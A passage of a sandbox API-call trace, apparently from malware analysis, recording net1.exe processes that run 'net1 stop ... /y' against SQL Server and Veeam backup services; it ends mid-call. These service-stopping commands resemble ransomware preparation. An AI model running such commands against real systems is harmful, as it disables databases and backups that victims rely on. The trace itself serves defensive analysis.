[0119.982] _wcsicmp (_String1="groups", _String2="MSSQLServerOLAPService") returned -6 [0119.982] _wcsicmp (_String1="help", _String2="MSSQLServerOLAPService") returned -5 [0119.982] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerOLAPService") returned -5 [0119.982] _wcsicmp (_String1="localgroup", _String2="MSSQLServerOLAPService") returned -1 [0119.982] _wcsicmp (_String1="pause", _String2="MSSQLServerOLAPService") returned 3 [0119.982] _wcsicmp (_String1="session", _String2="MSSQLServerOLAPService") returned 6 [0119.982] _wcsicmp (_String1="sessions", _String2="MSSQLServerOLAPService") returned 6 [0119.982] _wcsicmp (_String1="sess", _String2="MSSQLServerOLAPService") returned 6 [0119.982] _wcsicmp (_String1="share", _String2="MSSQLServerOLAPService") returned 6 [0119.982] _wcsicmp (_String1="start", _String2="MSSQLServerOLAPService") returned 6 [0119.982] _wcsicmp (_String1="stats", _String2="MSSQLServerOLAPService") returned 6 [0119.982] _wcsicmp (_String1="statistics", _String2="MSSQLServerOLAPService") returned 6 [0119.982] _wcsicmp (_String1="stop", _String2="MSSQLServerOLAPService") returned 6 [0119.982] _wcsicmp (_String1="time", _String2="MSSQLServerOLAPService") returned 7 [0119.982] _wcsicmp (_String1="user", _String2="MSSQLServerOLAPService") returned 8 [0119.982] _wcsicmp (_String1="users", _String2="MSSQLServerOLAPService") returned 8 [0119.982] _wcsicmp (_String1="msg", _String2="MSSQLServerOLAPService") returned -12 [0119.982] _wcsicmp (_String1="messenger", _String2="MSSQLServerOLAPService") returned -14 [0119.982] _wcsicmp (_String1="receiver", _String2="MSSQLServerOLAPService") returned 5 [0119.982] _wcsicmp (_String1="rcv", _String2="MSSQLServerOLAPService") returned 5 [0119.982] _wcsicmp (_String1="netpopup", _String2="MSSQLServerOLAPService") returned 1 [0119.982] _wcsicmp (_String1="redirector", _String2="MSSQLServerOLAPService") returned 5 [0119.982] _wcsicmp (_String1="redir", _String2="MSSQLServerOLAPService") returned 5 [0119.982] _wcsicmp (_String1="rdr", _String2="MSSQLServerOLAPService") returned 5 [0119.982] _wcsicmp (_String1="workstation", _String2="MSSQLServerOLAPService") returned 10 [0119.982] _wcsicmp (_String1="work", _String2="MSSQLServerOLAPService") returned 10 [0119.982] _wcsicmp (_String1="wksta", _String2="MSSQLServerOLAPService") returned 10 [0119.982] _wcsicmp (_String1="prdr", _String2="MSSQLServerOLAPService") returned 3 [0119.983] _wcsicmp (_String1="devrdr", _String2="MSSQLServerOLAPService") returned -9 [0119.983] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerOLAPService") returned -1 [0119.983] _wcsicmp (_String1="server", _String2="MSSQLServerOLAPService") returned 6 [0119.983] _wcsicmp (_String1="svr", _String2="MSSQLServerOLAPService") returned 6 [0119.983] _wcsicmp (_String1="srv", _String2="MSSQLServerOLAPService") returned 6 [0119.983] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerOLAPService") returned -1 [0119.983] _wcsicmp (_String1="alerter", _String2="MSSQLServerOLAPService") returned -12 [0119.983] _wcsicmp (_String1="netlogon", _String2="MSSQLServerOLAPService") returned 1 [0119.983] _wcsupr (in: _String="MSSQLServerOLAPService" | out: _String="MSSQLSERVEROLAPSERVICE") returned="MSSQLSERVEROLAPSERVICE" [0119.983] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x6e54d8 [0119.986] GetServiceKeyNameW (in: hSCManager=0x6e54d8, lpDisplayName="MSSQLSERVEROLAPSERVICE", lpServiceName=0x39aaf0, lpcchBuffer=0x2ff988 | out: lpServiceName="", lpcchBuffer=0x2ff988) returned 0 [0119.987] _wcsicmp (_String1="msg", _String2="MSSQLSERVEROLAPSERVICE") returned -12 [0119.987] _wcsicmp (_String1="messenger", _String2="MSSQLSERVEROLAPSERVICE") returned -14 [0119.987] _wcsicmp (_String1="receiver", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0119.987] _wcsicmp (_String1="rcv", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0119.987] _wcsicmp (_String1="redirector", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0119.987] _wcsicmp (_String1="redir", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0119.987] _wcsicmp (_String1="rdr", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0119.987] _wcsicmp (_String1="workstation", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0119.987] _wcsicmp (_String1="work", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0119.987] _wcsicmp (_String1="wksta", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0119.987] _wcsicmp (_String1="prdr", _String2="MSSQLSERVEROLAPSERVICE") returned 3 [0119.987] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVEROLAPSERVICE") returned -9 [0119.988] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVEROLAPSERVICE") returned -1 [0119.988] _wcsicmp (_String1="server", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0119.988] _wcsicmp (_String1="svr", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0119.988] _wcsicmp (_String1="srv", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0119.988] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVEROLAPSERVICE") returned -1 [0119.988] _wcsicmp (_String1="alerter", _String2="MSSQLSERVEROLAPSERVICE") returned -12 [0119.988] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVEROLAPSERVICE") returned 1 [0119.988] NetServiceControl (in: servername=0x0, service="MSSQLSERVEROLAPSERVICE", opcode=0x0, arg=0x0, bufptr=0x2ff984 | out: bufptr=0x2ff984) returned 0x889 [0119.989] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0119.989] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0119.990] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0119.991] GetFileType (hFile=0x0) returned 0x0 [0119.991] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x6e3ef8 [0119.991] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x6e3ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nm", lpUsedDefaultChar=0x0) returned 30 [0119.991] WriteFile (in: hFile=0x0, lpBuffer=0x6e3ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2ff8c4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff8c4, lpOverlapped=0x0) returned 0 [0119.991] LocalFree (hMem=0x6e3ef8) returned 0x0 [0119.991] GetFileType (hFile=0x0) returned 0x0 [0119.991] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6e61a0 [0119.991] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6e61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nn", lpUsedDefaultChar=0x0) returned 2 [0119.991] WriteFile (in: hFile=0x0, lpBuffer=0x6e61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff8c4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff8c4, lpOverlapped=0x0) returned 0 [0119.991] LocalFree (hMem=0x6e61a0) returned 0x0 [0119.991] _ultow (in: _Dest=0x889, _Radix=3143924 | out: _Dest=0x889) returned="2185" [0119.991] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0119.992] GetFileType (hFile=0x0) returned 0x0 [0119.992] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x6e61a0 [0119.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x6e61a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0119.992] WriteFile (in: hFile=0x0, lpBuffer=0x6e61a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2ff8d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff8d0, lpOverlapped=0x0) returned 0 [0119.992] LocalFree (hMem=0x6e61a0) returned 0x0 [0119.992] GetFileType (hFile=0x0) returned 0x0 [0119.992] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6e61a0 [0119.992] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x6e61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nn", lpUsedDefaultChar=0x0) returned 2 [0119.992] WriteFile (in: hFile=0x0, lpBuffer=0x6e61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2ff8d0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2ff8d0, lpOverlapped=0x0) returned 0 [0119.992] LocalFree (hMem=0x6e61a0) returned 0x0 [0119.993] NetApiBufferFree (Buffer=0x6e1b00) returned 0x0 [0119.993] NetApiBufferFree (Buffer=0x6e1b18) returned 0x0 [0119.993] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" [0119.993] exit (_Code=2) Process: id = "234" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5dd1e000" os_pid = "0xce4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "140" os_parent_pid = "0xf6c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 628 os_tid = 0xe98 [0119.773] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xcfb1c | out: lpSystemTimeAsFileTime=0xcfb1c*(dwLowDateTime=0x1b202190, dwHighDateTime=0x1d6f0d1)) [0119.773] GetCurrentProcessId () returned 0xce4 [0119.773] GetCurrentThreadId () returned 0xe98 [0119.774] GetTickCount () returned 0x1151391 [0119.774] QueryPerformanceCounter (in: lpPerformanceCount=0xcfb14 | out: lpPerformanceCount=0xcfb14*=23887446124) returned 1 [0119.774] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0119.774] __set_app_type (_Type=0x1) [0119.774] __p__fmode () returned 0x770331f4 [0119.774] __p__commode () returned 0x770331fc [0119.774] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0119.775] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0119.775] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.775] GetConsoleOutputCP () returned 0x1b5 [0119.994] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0119.994] SetThreadUILanguage (LangId=0x0) returned 0x409 [0119.997] sprintf_s (in: _DstBuf=0xcfad4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0119.998] setlocale (category=0, locale=".437") returned="English_United States.437" [0119.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0119.999] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0119.999] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" [0120.000] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xcf8a0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.000] RtlAllocateHeap (HeapHandle=0x7d0000, Flags=0x0, Size=0x80) returned 0x7e3af8 [0120.000] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.000] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfaa4 | out: Buffer=0xcfaa4*=0x7e1b00) returned 0x0 [0120.000] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xcfaa4 | out: Buffer=0xcfaa4*=0x7e1b18) returned 0x0 [0120.000] _fileno (_File=0x77032900) returned -2 [0120.000] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.000] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.000] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.000] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.000] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.000] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.000] _wcsicmp (_String1="file", _String2="stop") returned -13 [0120.000] _wcsicmp (_String1="files", _String2="stop") returned -13 [0120.000] _wcsicmp (_String1="group", _String2="stop") returned -12 [0120.000] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0120.000] _wcsicmp (_String1="help", _String2="stop") returned -11 [0120.000] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0120.000] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0120.000] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0120.000] _wcsicmp (_String1="session", _String2="stop") returned -15 [0120.001] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0120.001] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0120.001] _wcsicmp (_String1="share", _String2="stop") returned -12 [0120.001] _wcsicmp (_String1="start", _String2="stop") returned -14 [0120.001] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0120.001] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0120.001] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0120.001] _wcsicmp (_String1="accounts", _String2="MSSQLServerADHelper100") returned -12 [0120.001] _wcsicmp (_String1="computer", _String2="MSSQLServerADHelper100") returned -10 [0120.001] _wcsicmp (_String1="config", _String2="MSSQLServerADHelper100") returned -10 [0120.001] _wcsicmp (_String1="continue", _String2="MSSQLServerADHelper100") returned -10 [0120.001] _wcsicmp (_String1="cont", _String2="MSSQLServerADHelper100") returned -10 [0120.001] _wcsicmp (_String1="file", _String2="MSSQLServerADHelper100") returned -7 [0120.001] _wcsicmp (_String1="files", _String2="MSSQLServerADHelper100") returned -7 [0120.001] _wcsicmp (_String1="group", _String2="MSSQLServerADHelper100") returned -6 [0120.001] _wcsicmp (_String1="groups", _String2="MSSQLServerADHelper100") returned -6 [0120.001] _wcsicmp (_String1="help", _String2="MSSQLServerADHelper100") returned -5 [0120.001] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerADHelper100") returned -5 [0120.001] _wcsicmp (_String1="localgroup", _String2="MSSQLServerADHelper100") returned -1 [0120.001] _wcsicmp (_String1="pause", _String2="MSSQLServerADHelper100") returned 3 [0120.001] _wcsicmp (_String1="session", _String2="MSSQLServerADHelper100") returned 6 [0120.001] _wcsicmp (_String1="sessions", _String2="MSSQLServerADHelper100") returned 6 [0120.001] _wcsicmp (_String1="sess", _String2="MSSQLServerADHelper100") returned 6 [0120.001] _wcsicmp (_String1="share", _String2="MSSQLServerADHelper100") returned 6 [0120.001] _wcsicmp (_String1="start", _String2="MSSQLServerADHelper100") returned 6 [0120.001] _wcsicmp (_String1="stats", _String2="MSSQLServerADHelper100") returned 6 [0120.001] _wcsicmp (_String1="statistics", _String2="MSSQLServerADHelper100") returned 6 [0120.001] _wcsicmp (_String1="stop", _String2="MSSQLServerADHelper100") returned 6 [0120.001] _wcsicmp (_String1="time", _String2="MSSQLServerADHelper100") returned 7 [0120.001] _wcsicmp (_String1="user", _String2="MSSQLServerADHelper100") returned 8 [0120.001] _wcsicmp (_String1="users", _String2="MSSQLServerADHelper100") returned 8 [0120.001] _wcsicmp (_String1="msg", _String2="MSSQLServerADHelper100") returned -12 [0120.001] _wcsicmp (_String1="messenger", _String2="MSSQLServerADHelper100") returned -14 [0120.001] _wcsicmp (_String1="receiver", _String2="MSSQLServerADHelper100") returned 5 [0120.001] _wcsicmp (_String1="rcv", _String2="MSSQLServerADHelper100") returned 5 [0120.002] _wcsicmp (_String1="netpopup", _String2="MSSQLServerADHelper100") returned 1 [0120.002] _wcsicmp (_String1="redirector", _String2="MSSQLServerADHelper100") returned 5 [0120.002] _wcsicmp (_String1="redir", _String2="MSSQLServerADHelper100") returned 5 [0120.002] _wcsicmp (_String1="rdr", _String2="MSSQLServerADHelper100") returned 5 [0120.002] _wcsicmp (_String1="workstation", _String2="MSSQLServerADHelper100") returned 10 [0120.002] _wcsicmp (_String1="work", _String2="MSSQLServerADHelper100") returned 10 [0120.002] _wcsicmp (_String1="wksta", _String2="MSSQLServerADHelper100") returned 10 [0120.002] _wcsicmp (_String1="prdr", _String2="MSSQLServerADHelper100") returned 3 [0120.002] _wcsicmp (_String1="devrdr", _String2="MSSQLServerADHelper100") returned -9 [0120.002] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerADHelper100") returned -1 [0120.002] _wcsicmp (_String1="server", _String2="MSSQLServerADHelper100") returned 6 [0120.002] _wcsicmp (_String1="svr", _String2="MSSQLServerADHelper100") returned 6 [0120.002] _wcsicmp (_String1="srv", _String2="MSSQLServerADHelper100") returned 6 [0120.002] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerADHelper100") returned -1 [0120.002] _wcsicmp (_String1="alerter", _String2="MSSQLServerADHelper100") returned -12 [0120.002] _wcsicmp (_String1="netlogon", _String2="MSSQLServerADHelper100") returned 1 [0120.002] _wcsupr (in: _String="MSSQLServerADHelper100" | out: _String="MSSQLSERVERADHELPER100") returned="MSSQLSERVERADHELPER100" [0120.002] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7e54d8 [0120.005] GetServiceKeyNameW (in: hSCManager=0x7e54d8, lpDisplayName="MSSQLSERVERADHELPER100", lpServiceName=0x39aaf0, lpcchBuffer=0xcfa40 | out: lpServiceName="", lpcchBuffer=0xcfa40) returned 0 [0120.006] _wcsicmp (_String1="msg", _String2="MSSQLSERVERADHELPER100") returned -12 [0120.006] _wcsicmp (_String1="messenger", _String2="MSSQLSERVERADHELPER100") returned -14 [0120.006] _wcsicmp (_String1="receiver", _String2="MSSQLSERVERADHELPER100") returned 5 [0120.006] _wcsicmp (_String1="rcv", _String2="MSSQLSERVERADHELPER100") returned 5 [0120.006] _wcsicmp (_String1="redirector", _String2="MSSQLSERVERADHELPER100") returned 5 [0120.006] _wcsicmp (_String1="redir", _String2="MSSQLSERVERADHELPER100") returned 5 [0120.006] _wcsicmp (_String1="rdr", _String2="MSSQLSERVERADHELPER100") returned 5 [0120.006] _wcsicmp (_String1="workstation", _String2="MSSQLSERVERADHELPER100") returned 10 [0120.006] _wcsicmp (_String1="work", _String2="MSSQLSERVERADHELPER100") returned 10 [0120.006] _wcsicmp (_String1="wksta", _String2="MSSQLSERVERADHELPER100") returned 10 [0120.006] _wcsicmp (_String1="prdr", _String2="MSSQLSERVERADHELPER100") returned 3 [0120.006] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVERADHELPER100") returned -9 [0120.006] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVERADHELPER100") returned -1 [0120.007] _wcsicmp (_String1="server", _String2="MSSQLSERVERADHELPER100") returned 6 [0120.007] _wcsicmp (_String1="svr", _String2="MSSQLSERVERADHELPER100") returned 6 [0120.007] _wcsicmp (_String1="srv", _String2="MSSQLSERVERADHELPER100") returned 6 [0120.007] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVERADHELPER100") returned -1 [0120.007] _wcsicmp (_String1="alerter", _String2="MSSQLSERVERADHELPER100") returned -12 [0120.007] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVERADHELPER100") returned 1 [0120.007] NetServiceControl (in: servername=0x0, service="MSSQLSERVERADHELPER100", opcode=0x0, arg=0x0, bufptr=0xcfa3c | out: bufptr=0xcfa3c) returned 0x889 [0120.008] wcscpy_s (in: _Destination=0x39a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0120.008] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74860000 [0120.009] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74860000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0120.010] GetFileType (hFile=0x0) returned 0x0 [0120.010] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7e3ef8 [0120.010] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7e3ef8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n}", lpUsedDefaultChar=0x0) returned 30 [0120.010] WriteFile (in: hFile=0x0, lpBuffer=0x7e3ef8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xcf97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf97c, lpOverlapped=0x0) returned 0 [0120.010] LocalFree (hMem=0x7e3ef8) returned 0x0 [0120.010] GetFileType (hFile=0x0) returned 0x0 [0120.010] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7e61a0 [0120.010] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7e61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n~", lpUsedDefaultChar=0x0) returned 2 [0120.010] WriteFile (in: hFile=0x0, lpBuffer=0x7e61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcf97c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf97c, lpOverlapped=0x0) returned 0 [0120.010] LocalFree (hMem=0x7e61a0) returned 0x0 [0120.010] _ultow (in: _Dest=0x889, _Radix=850348 | out: _Dest=0x889) returned="2185" [0120.010] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74860000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x39b338, nSize=0x800, Arguments=0x399dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0120.011] GetFileType (hFile=0x0) returned 0x0 [0120.011] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7e61a0 [0120.011] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7e61a0, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0120.011] WriteFile (in: hFile=0x0, lpBuffer=0x7e61a0, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xcf988, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf988, lpOverlapped=0x0) returned 0 [0120.011] LocalFree (hMem=0x7e61a0) returned 0x0 [0120.011] GetFileType (hFile=0x0) returned 0x0 [0120.011] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7e61a0 [0120.011] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7e61a0, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n~", lpUsedDefaultChar=0x0) returned 2 [0120.011] WriteFile (in: hFile=0x0, lpBuffer=0x7e61a0, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xcf988, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0xcf988, lpOverlapped=0x0) returned 0 [0120.011] LocalFree (hMem=0x7e61a0) returned 0x0 [0120.011] NetApiBufferFree (Buffer=0x7e1b00) returned 0x0 [0120.012] NetApiBufferFree (Buffer=0x7e1b18) returned 0x0 [0120.012] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" [0120.012] exit (_Code=2) Process: id = "235" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x5dadd000" os_pid = "0x111c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "142" os_parent_pid = "0xf84" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 629 os_tid = 0xc4c [0119.803] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfba4 | out: lpSystemTimeAsFileTime=0x1cfba4*(dwLowDateTime=0x1b24e450, dwHighDateTime=0x1d6f0d1)) [0119.803] GetCurrentProcessId () returned 0x111c [0119.803] GetCurrentThreadId () returned 0xc4c [0119.803] GetTickCount () returned 0x11513a1 [0119.803] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfb9c | out: lpPerformanceCount=0x1cfb9c*=23890416447) returned 1 [0119.804] GetModuleHandleA (lpModuleName=0x0) returned 0x380000 [0119.804] __set_app_type (_Type=0x1) [0119.804] __p__fmode () returned 0x770331f4 [0119.804] __p__commode () returned 0x770331fc [0119.804] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x38ffe6) returned 0x0 [0119.804] __getmainargs (in: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068, _DoWildCard=0, _StartInfo=0x399024 | out: _Argc=0x399064, _Argv=0x39906c, _Env=0x399068) returned 0 [0119.804] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0119.805] GetConsoleOutputCP () returned 0x1b5 [0119.805] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x399080 | out: lpCPInfo=0x399080) returned 1 [0119.805] SetThreadUILanguage (LangId=0x0) returned 0x409 [0120.014] sprintf_s (in: _DstBuf=0x1cfb5c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0120.014] setlocale (category=0, locale=".437") returned="English_United States.437" [0120.016] GetStdHandle (nStdHandle=0xfffffff5) returned 0x448 [0120.016] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0120.016] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamMountSvc /y" [0120.016] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf928, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0120.016] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x6e) returned 0x283ae0 [0120.016] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0120.016] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cfb2c | out: Buffer=0x1cfb2c*=0x281ae8) returned 0x0 [0120.016] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cfb2c | out: Buffer=0x1cfb2c*=0x281b00) returned 0x0 [0120.016] _fileno (_File=0x77032900) returned -2 [0120.016] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0120.016] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0120.016] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0120.016] _wcsicmp (_String1="config", _String2="stop") returned -16 [0120.016] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0120.016] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0120.016] _wcsicmp (_String1="file", 